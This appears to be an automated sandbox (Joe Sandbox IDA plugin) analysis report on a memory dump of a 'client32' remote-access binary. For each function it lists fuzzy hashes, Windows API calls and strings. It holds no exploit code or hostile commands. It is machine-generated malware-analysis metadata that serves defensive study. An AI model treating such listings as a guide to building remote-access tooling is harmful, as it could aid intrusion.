                                                                                        • Instruction ID: 3a296536204feeda3cf5b5ace87cff4b3db999d64eabd005e2355b496405e70e
                                                                                        • Opcode Fuzzy Hash: 6731b4a21ae5097193c9452f6bf6a924e6ae7ca037130a291c3622393df669cb
                                                                                        • Instruction Fuzzy Hash: ED214875E04329BFD724CE61CC8AF9EB3A8EB4871CF40C439F62A5A580E674E540CB51
                                                                                        APIs
                                                                                        • GetDlgItemTextA.USER32 ref: 11037824
                                                                                        • SelectObject.GDI32(?,?), ref: 11037872
                                                                                        • InflateRect.USER32 ref: 110378C6
                                                                                        • GetBkColor.GDI32(?), ref: 11037A5C
                                                                                        • InflateRect.USER32 ref: 110378F9
                                                                                          • Part of subcall function 111430E0: SetBkColor.GDI32(?,00000000), ref: 111430F4
                                                                                          • Part of subcall function 111430E0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 11143109
                                                                                          • Part of subcall function 111430E0: SetBkColor.GDI32(?,00000000), ref: 11143111
                                                                                        • InflateRect.USER32 ref: 11037923
                                                                                        • GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 11037938
                                                                                        • DrawTextA.USER32(?,?,?,?,00000410), ref: 11037AC4
                                                                                        • DrawTextA.USER32(?,?,?,?,00000010), ref: 11037B37
                                                                                        • SelectObject.GDI32(?,00000000), ref: 11037B49
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Text$ColorInflateRect$DrawObjectSelect$ExtentItemPoint32
                                                                                        • String ID:
                                                                                        • API String ID: 649858571-0
                                                                                        • Opcode ID: 8c3c34273943b99b0013a915077c792c96fcf62e4e8e82a874e7d53c05ba55d1
                                                                                        • Instruction ID: f09bb6a206b11b6dc813d6ae8b65a0757b728a19553feb9795e3200704aae7d5
                                                                                        • Opcode Fuzzy Hash: 8c3c34273943b99b0013a915077c792c96fcf62e4e8e82a874e7d53c05ba55d1
                                                                                        • Instruction Fuzzy Hash: A1A159719006299FDB64CF59CC80F9AB7B9FB88314F1086D9E55DA3290EB30AE85CF51
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Caret$CreateDestroyFocusItemShow
                                                                                        • String ID:
                                                                                        • API String ID: 3189774202-0
                                                                                        • Opcode ID: 4efeef9138cc8cf07fe9f319340381759070747349b18f9b79cddb7145ce07d1
                                                                                        • Instruction ID: d774194b0a6d8be079c8d936a3d9a24877d34e73af743b83035fdfa72e7830a2
                                                                                        • Opcode Fuzzy Hash: 4efeef9138cc8cf07fe9f319340381759070747349b18f9b79cddb7145ce07d1
                                                                                        • Instruction Fuzzy Hash: 1E61D375B002199BE724CF64DC84BEE73E9FB88701F504959F997CB2C0DA76A841C7A8
                                                                                        APIs
                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 110351E0
                                                                                          • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
                                                                                          • Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
                                                                                          • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4
                                                                                        • _memmove.LIBCMT ref: 11035267
                                                                                        • _memmove.LIBCMT ref: 1103528B
                                                                                        • _memmove.LIBCMT ref: 110352C5
                                                                                        • _memmove.LIBCMT ref: 110352E1
                                                                                        • std::exception::exception.LIBCMT ref: 1103532B
                                                                                        • __CxxThrowException@8.LIBCMT ref: 11035340
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                                        • String ID: deque<T> too long
                                                                                        • API String ID: 827257264-309773918
                                                                                        • Opcode ID: 9fd23bf6dac31a49ae45c6df2bf8e53b139aa7f77a234edd96a6a4a66ff4c3c5
                                                                                        • Instruction ID: 821c9d64e9829e99cd7e27c5d42d77d1d91c6fa62e2a3a65c26b72f4499baf16
                                                                                        • Opcode Fuzzy Hash: 9fd23bf6dac31a49ae45c6df2bf8e53b139aa7f77a234edd96a6a4a66ff4c3c5
                                                                                        • Instruction Fuzzy Hash: 714175B6E101059FDB04CEA8CC81AAEB7FAABD4215F19C569E809D7344EA75EA01C790
                                                                                        APIs
                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 11019370
                                                                                          • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
                                                                                          • Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
                                                                                          • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4
                                                                                        • _memmove.LIBCMT ref: 110193F7
                                                                                        • _memmove.LIBCMT ref: 1101941B
                                                                                        • _memmove.LIBCMT ref: 11019455
                                                                                        • _memmove.LIBCMT ref: 11019471
                                                                                        • std::exception::exception.LIBCMT ref: 110194BB
                                                                                        • __CxxThrowException@8.LIBCMT ref: 110194D0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                                        • String ID: deque<T> too long
                                                                                        • API String ID: 827257264-309773918
                                                                                        • Opcode ID: bae61be491e2bb3249092c57a3b297af750743dd0981f067cd33e8b54ce2a0b4
                                                                                        • Instruction ID: 6a0b8da8f8671f5151ad1a9c663becfdb7ffb53f3c5f022c538811db2e8c78d4
                                                                                        • Opcode Fuzzy Hash: bae61be491e2bb3249092c57a3b297af750743dd0981f067cd33e8b54ce2a0b4
                                                                                        • Instruction Fuzzy Hash: C54168B6E001159BDB04CE68CC81AAEF7F9AF94318F19C569D809DB349FA75EA01C790
                                                                                        APIs
                                                                                          • Part of subcall function 11113040: GetClientRect.USER32(?,?,?,?,75097D2F,?,?,?,?,11119CBE,00000000), ref: 1111306A
                                                                                        • GetWindowRect.USER32(?,?), ref: 111194E1
                                                                                        • MapWindowPoints.USER32 ref: 111194FA
                                                                                        • GetClientRect.USER32(?,?), ref: 11119508
                                                                                        • GetScrollRange.USER32(?,00000000,?,?), ref: 11119549
                                                                                        • GetSystemMetrics.USER32(00000003), ref: 11119559
                                                                                        • GetScrollRange.USER32(?,00000001,?,00000000), ref: 1111956C
                                                                                        • GetSystemMetrics.USER32(00000002), ref: 11119576
                                                                                        Strings
                                                                                        • GetParentDims, wl=%d,wt=%d,wr=%d,wb=%d, cl=%d,ct=%d,cr=%d,cb=%d, dl=%d,dt=%d,dr=%d,db=%d, xrefs: 111195BC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Rect$ClientMetricsRangeScrollSystemWindow$Points
                                                                                        • String ID: GetParentDims, wl=%d,wt=%d,wr=%d,wb=%d, cl=%d,ct=%d,cr=%d,cb=%d, dl=%d,dt=%d,dr=%d,db=%d
                                                                                        • API String ID: 4172599486-2052393828
                                                                                        • Opcode ID: 25663d0ab3fb6dd7e3eee4b612ed1c5879d89d1bfa55b3a52e18faf4dfa943c1
                                                                                        • Instruction ID: 912fb1d3c2cdad7c34c8054a8beb9bd8394091149dbdaf68818a53be5a6566d8
                                                                                        • Opcode Fuzzy Hash: 25663d0ab3fb6dd7e3eee4b612ed1c5879d89d1bfa55b3a52e18faf4dfa943c1
                                                                                        • Instruction Fuzzy Hash: E051F8B1900609AFDB14CFA8C980BEEFBF9FF88314F104569E526A7244D774A941CF60
                                                                                        APIs
                                                                                          • Part of subcall function 110B7DF0: GetModuleHandleA.KERNEL32(kernel32.dll,ProcessIdToSessionId,00000000,00000000), ref: 110B7E16
                                                                                          • Part of subcall function 110B7DF0: GetProcAddress.KERNEL32(00000000), ref: 110B7E1D
                                                                                          • Part of subcall function 110B7DF0: GetCurrentProcessId.KERNEL32(00000000), ref: 110B7E33
                                                                                        • wsprintfA.USER32 ref: 1100977F
                                                                                        • wsprintfA.USER32 ref: 11009799
                                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 11009883
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: wsprintf$AddressCreateCurrentFileHandleModuleProcProcess
                                                                                        • String ID: %s%s.htm$.%u$ApprovedWebList$Store\
                                                                                        • API String ID: 559337438-1872371932
                                                                                        • Opcode ID: 75e124715683d0050a8ee82640661044f3f240f0669dfaf61e393b75286c4924
                                                                                        • Instruction ID: 771b4b075f664bf931435fe457300570bff5ff9721ddd3c1a78cab015962a136
                                                                                        • Opcode Fuzzy Hash: 75e124715683d0050a8ee82640661044f3f240f0669dfaf61e393b75286c4924
                                                                                        • Instruction Fuzzy Hash: 4351D331E0025E9FEB15CF689C91BDABBE4AF09344F4441E5D99DEB341FA309A49CB90
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,?), ref: 11025351
                                                                                          • Part of subcall function 11025000: SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 11025036
                                                                                          • Part of subcall function 11025000: SendMessageA.USER32(?,000000BA,00000000,00000000), ref: 11025049
                                                                                          • Part of subcall function 11025000: SendMessageA.USER32(?,000000BB,-00000001,00000000), ref: 1102505A
                                                                                          • Part of subcall function 11025000: SendMessageA.USER32(?,000000C1,00000000,00000000), ref: 11025065
                                                                                          • Part of subcall function 11025000: SendMessageA.USER32(?,000000C4,-00000001,?), ref: 1102507E
                                                                                          • Part of subcall function 11025000: GetDC.USER32(?), ref: 11025085
                                                                                          • Part of subcall function 11025000: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 11025095
                                                                                          • Part of subcall function 11025000: SelectObject.GDI32(?,00000000), ref: 110250A2
                                                                                          • Part of subcall function 11025000: GetTextExtentPoint32A.GDI32(?,00000020,00000001,?), ref: 110250B8
                                                                                          • Part of subcall function 11025000: SelectObject.GDI32(?,?), ref: 110250C7
                                                                                          • Part of subcall function 11025000: ReleaseDC.USER32(?,?), ref: 110250CF
                                                                                        • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 110253C9
                                                                                        • SendMessageA.USER32(00000000,000000B1,00000000,-00000002), ref: 110253DA
                                                                                        • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 110253E8
                                                                                        • SendMessageA.USER32(00000000,0000000E,00000000,00000000), ref: 110253F1
                                                                                        • SendMessageA.USER32(00000000,000000B1,?,?), ref: 11025425
                                                                                        • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 11025433
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MessageSend$ObjectSelect$ExtentItemPoint32ReleaseText
                                                                                        • String ID: 8
                                                                                        • API String ID: 762489935-4194326291
                                                                                        • Opcode ID: 6d55198dcb8903f7cb199ecb074005425c4f27be9449354806f6e1afde77a9a3
                                                                                        • Instruction ID: 930c0c8f097ea1a0c561faf68991d79795fa3a28e1f50edb77ad2a2483817317
                                                                                        • Opcode Fuzzy Hash: 6d55198dcb8903f7cb199ecb074005425c4f27be9449354806f6e1afde77a9a3
                                                                                        • Instruction Fuzzy Hash: B6419471E01219AFDB14DFA4CC41FEEB7B8EF48705F508169F906E6180DBB5AA40CB69
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ItemMenu$Info$CheckCountEnable_memset
                                                                                        • String ID: 0
                                                                                        • API String ID: 2755257978-4108050209
                                                                                        • Opcode ID: 64426ca387f460fb7a01fd0aca5c54c25300771ffc0ff337154cefcaf6503ee4
                                                                                        • Instruction ID: 3498b13fe94e5af900cf0a89c9b181a4bb2b9f9614c8d31ca7af4f255d02c70f
                                                                                        • Opcode Fuzzy Hash: 64426ca387f460fb7a01fd0aca5c54c25300771ffc0ff337154cefcaf6503ee4
                                                                                        • Instruction Fuzzy Hash: AB31A170D41219ABEB01DFA4C988BDEBBFCEF46398F008059F851EB250D7B59A44CB60
                                                                                        APIs
                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\ProductOptions,00000000,00020019,?), ref: 1113176C
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 1113181D
                                                                                          • Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32 ref: 11143BF0
                                                                                        • LocalAlloc.KERNEL32(00000040,1113832B,00000000,?,?,?,?,?,?,?,?,?,?,?,1113832B,Terminal Server), ref: 111317A4
                                                                                        • lstrcmpA.KERNEL32(00000000,?), ref: 111317E6
                                                                                        • lstrlenA.KERNEL32(00000000), ref: 111317ED
                                                                                        • LocalFree.KERNEL32(00000000), ref: 11131808
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Local$AllocCloseFreeOpenQueryValuelstrcmplstrlen
                                                                                        • String ID: ProductSuite$System\CurrentControlSet\Control\ProductOptions
                                                                                        • API String ID: 2999768849-588814233
                                                                                        • Opcode ID: 2519e8d1bf1f1312672c33839baea648f7a77d650c12a73db754429def886c69
                                                                                        • Instruction ID: 2515fb7f011805fb85e8c25417bcbf5fc72413bf415e28cc1fef82dce871dec7
                                                                                        • Opcode Fuzzy Hash: 2519e8d1bf1f1312672c33839baea648f7a77d650c12a73db754429def886c69
                                                                                        • Instruction Fuzzy Hash: 323163B6D1425DBFEB11CFA5CD84EAEF7BCAB84619F1441A8E814A3604D730AA0487A5
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Window$Class_memset$CreateDestroyInfoRectRegister
                                                                                        • String ID: NSMChatSizeWnd
                                                                                        • API String ID: 2883038198-4119039562
